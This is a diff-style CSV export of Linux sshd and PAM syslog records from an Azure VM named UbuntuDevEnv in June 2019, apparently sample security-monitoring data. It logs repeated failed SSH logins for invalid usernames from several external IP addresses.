+17625,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:16:50,UbuntuDevEnv,2019-06-26 09:16:49,auth,UbuntuDevEnv,info,Disconnected from invalid user ir 176.31.43.255 port 43606 [preauth],68020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ir,176.31.43.2,43606,,
+17626,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:16:50,UbuntuDevEnv,2019-06-26 09:16:49,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 43606:11: Bye Bye [preauth],68020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,43606,,
+17627,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:17:01,UbuntuDevEnv,2019-06-26 09:17:00,auth,UbuntuDevEnv,info,Invalid user muriel from 187.6.249.142 port 37732,68068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,muriel,187.6.249.1,37732,,
+17628,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:17:01,UbuntuDevEnv,2019-06-26 09:17:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142,68068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,187.6.249.1,,0,
+17629,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:17:01,UbuntuDevEnv,2019-06-26 09:17:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17630,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:17:03,UbuntuDevEnv,2019-06-26 09:17:02,auth,UbuntuDevEnv,info,Failed password for invalid user muriel from 187.6.249.142 port 37732 ssh2,68068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,muriel,187.6.249.1,37732,,
+17631,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:17:03,UbuntuDevEnv,2019-06-26 09:17:02,auth,UbuntuDevEnv,info,Disconnected from invalid user muriel 187.6.249.142 port 37732 [preauth],68068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,muriel,187.6.249.1,37732,,
+17632,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:17:03,UbuntuDevEnv,2019-06-26 09:17:02,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 37732:11: Bye Bye [preauth],68068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,37732,,
+17633,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:17:09,UbuntuDevEnv,2019-06-26 09:17:08,auth,UbuntuDevEnv,info,Invalid user guest from 165.22.203.187 port 53742,68108,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,165.22.203.1,53742,,
+17634,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:17:09,UbuntuDevEnv,2019-06-26 09:17:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68108,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17635,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:17:09,UbuntuDevEnv,2019-06-26 09:17:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,68108,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+17636,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:17:11,UbuntuDevEnv,2019-06-26 09:17:10,auth,UbuntuDevEnv,info,Failed password for invalid user guest from 165.22.203.187 port 53742 ssh2,68108,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,165.22.203.1,53742,,
+17637,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:17:11,UbuntuDevEnv,2019-06-26 09:17:10,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 53742:11: Bye Bye [preauth],68108,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,53742,,
+17638,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:17:11,UbuntuDevEnv,2019-06-26 09:17:10,auth,UbuntuDevEnv,info,Disconnected from invalid user guest 165.22.203.187 port 53742 [preauth],68108,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,165.22.203.1,53742,,
+17639,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:17:19,UbuntuDevEnv,2019-06-26 09:17:19,auth,UbuntuDevEnv,info,Invalid user whoopsie from 176.31.202.90 port 42198,68147,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,whoopsie,176.31.202.9,42198,,
+17640,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:17:19,UbuntuDevEnv,2019-06-26 09:17:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,68147,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+17641,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:17:19,UbuntuDevEnv,2019-06-26 09:17:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68147,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17642,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:17:22,UbuntuDevEnv,2019-06-26 09:17:21,auth,UbuntuDevEnv,info,Failed password for invalid user whoopsie from 176.31.202.90 port 42198 ssh2,68147,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,whoopsie,176.31.202.9,42198,,
+17643,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:17:22,UbuntuDevEnv,2019-06-26 09:17:21,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 42198:11: Bye Bye [preauth],68147,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,42198,,
+17644,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:17:22,UbuntuDevEnv,2019-06-26 09:17:21,auth,UbuntuDevEnv,info,Disconnected from invalid user whoopsie 176.31.202.90 port 42198 [preauth],68147,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,whoopsie,176.31.202.9,42198,,
+17645,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:10,UbuntuDevEnv,2019-06-26 09:18:09,auth,UbuntuDevEnv,info,Invalid user vn from 176.31.43.255 port 52528,68325,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vn,176.31.43.2,52528,,
+17646,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:10,UbuntuDevEnv,2019-06-26 09:18:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68325,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17647,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:10,UbuntuDevEnv,2019-06-26 09:18:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,68325,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+17648,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:11,UbuntuDevEnv,2019-06-26 09:18:11,auth,UbuntuDevEnv,info,Failed password for invalid user vn from 176.31.43.255 port 52528 ssh2,68325,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vn,176.31.43.2,52528,,
+17649,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:11,UbuntuDevEnv,2019-06-26 09:18:11,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 52528:11: Bye Bye [preauth],68325,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,52528,,
+17650,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:11,UbuntuDevEnv,2019-06-26 09:18:11,auth,UbuntuDevEnv,info,Disconnected from invalid user vn 176.31.43.255 port 52528 [preauth],68325,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vn,176.31.43.2,52528,,
+17651,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:34,UbuntuDevEnv,2019-06-26 09:18:33,auth,UbuntuDevEnv,info,Invalid user noc from 165.22.203.187 port 47330,68403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,noc,165.22.203.1,47330,,
+17652,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:34,UbuntuDevEnv,2019-06-26 09:18:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17653,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:34,UbuntuDevEnv,2019-06-26 09:18:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,68403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+17654,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:36,UbuntuDevEnv,2019-06-26 09:18:35,auth,UbuntuDevEnv,info,Failed password for invalid user noc from 165.22.203.187 port 47330 ssh2,68403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,noc,165.22.203.1,47330,,
+17655,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:36,UbuntuDevEnv,2019-06-26 09:18:35,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 47330:11: Bye Bye [preauth],68403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,47330,,
+17656,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:36,UbuntuDevEnv,2019-06-26 09:18:35,auth,UbuntuDevEnv,info,Disconnected from invalid user noc 165.22.203.187 port 47330 [preauth],68403,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,noc,165.22.203.1,47330,,
+17657,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:44,UbuntuDevEnv,2019-06-26 09:18:44,auth,UbuntuDevEnv,info,Invalid user admin from 176.31.202.90 port 59002,68446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,176.31.202.9,59002,,
+17658,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:44,UbuntuDevEnv,2019-06-26 09:18:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17659,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:44,UbuntuDevEnv,2019-06-26 09:18:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,68446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+17660,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:46,UbuntuDevEnv,2019-06-26 09:18:45,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 176.31.202.90 port 59002 ssh2,68446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,176.31.202.9,59002,,
+17661,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:46,UbuntuDevEnv,2019-06-26 09:18:45,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 59002:11: Bye Bye [preauth],68446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,59002,,
+17662,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:46,UbuntuDevEnv,2019-06-26 09:18:45,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 176.31.202.90 port 59002 [preauth],68446,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,176.31.202.9,59002,,
+17663,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:55,UbuntuDevEnv,2019-06-26 09:18:55,auth,UbuntuDevEnv,info,Invalid user teamspeak from 118.24.90.122 port 9346,68481,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak,118.24.90.1,9346,,
+17664,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:55,UbuntuDevEnv,2019-06-26 09:18:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68481,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17665,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:55,UbuntuDevEnv,2019-06-26 09:18:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.90.122,68481,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.90.1,,0,
+17666,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:56,UbuntuDevEnv,2019-06-26 09:18:56,auth,UbuntuDevEnv,info,Invalid user teddy from 187.6.249.142 port 54630,68489,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teddy,187.6.249.1,54630,,
+17667,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:56,UbuntuDevEnv,2019-06-26 09:18:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68489,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17668,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:56,UbuntuDevEnv,2019-06-26 09:18:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142,68489,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,187.6.249.1,,0,
+17669,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:57,UbuntuDevEnv,2019-06-26 09:18:56,auth,UbuntuDevEnv,info,Failed password for invalid user teamspeak from 118.24.90.122 port 9346 ssh2,68481,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak,118.24.90.1,9346,,
+17670,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:57,UbuntuDevEnv,2019-06-26 09:18:57,auth,UbuntuDevEnv,info,Disconnected from invalid user teamspeak 118.24.90.122 port 9346 [preauth],68481,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teamspeak,118.24.90.1,9346,,
+17671,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:57,UbuntuDevEnv,2019-06-26 09:18:57,auth,UbuntuDevEnv,info,Received disconnect from 118.24.90.122 port 9346:11: Bye Bye [preauth],68481,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.90.1,9346,,
+17672,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:58,UbuntuDevEnv,2019-06-26 09:18:57,auth,UbuntuDevEnv,info,Failed password for invalid user teddy from 187.6.249.142 port 54630 ssh2,68489,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teddy,187.6.249.1,54630,,
+17673,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:58,UbuntuDevEnv,2019-06-26 09:18:57,auth,UbuntuDevEnv,info,Disconnected from invalid user teddy 187.6.249.142 port 54630 [preauth],68489,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teddy,187.6.249.1,54630,,
+17674,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:18:58,UbuntuDevEnv,2019-06-26 09:18:57,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 54630:11: Bye Bye [preauth],68489,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,54630,,
+17675,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:19:35,UbuntuDevEnv,2019-06-26 09:19:34,auth,UbuntuDevEnv,info,Connection closed by 118.24.90.122 port 1670 [preauth],68258,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.90.1,1670,,
+17676,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:19:35,UbuntuDevEnv,2019-06-26 09:19:34,auth,UbuntuDevEnv,info,Invalid user noc from 176.31.43.255 port 59746,68914,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,noc,176.31.43.2,59746,,
+17677,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:19:35,UbuntuDevEnv,2019-06-26 09:19:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68914,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17678,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:19:35,UbuntuDevEnv,2019-06-26 09:19:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,68914,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+17679,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:19:38,UbuntuDevEnv,2019-06-26 09:19:37,auth,UbuntuDevEnv,info,Failed password for invalid user noc from 176.31.43.255 port 59746 ssh2,68914,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,noc,176.31.43.2,59746,,
+17680,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:19:38,UbuntuDevEnv,2019-06-26 09:19:37,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 59746:11: Bye Bye [preauth],68914,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,59746,,
+17681,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:19:38,UbuntuDevEnv,2019-06-26 09:19:37,auth,UbuntuDevEnv,info,Disconnected from invalid user noc 176.31.43.255 port 59746 [preauth],68914,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,noc,176.31.43.2,59746,,
+17682,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:19:53,UbuntuDevEnv,2019-06-26 09:19:53,auth,UbuntuDevEnv,info,Invalid user server from 118.24.90.122 port 16476,68988,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,server,118.24.90.1,16476,,
+17683,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:19:53,UbuntuDevEnv,2019-06-26 09:19:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,68988,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17684,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:19:53,UbuntuDevEnv,2019-06-26 09:19:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.90.122,68988,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.90.1,,0,
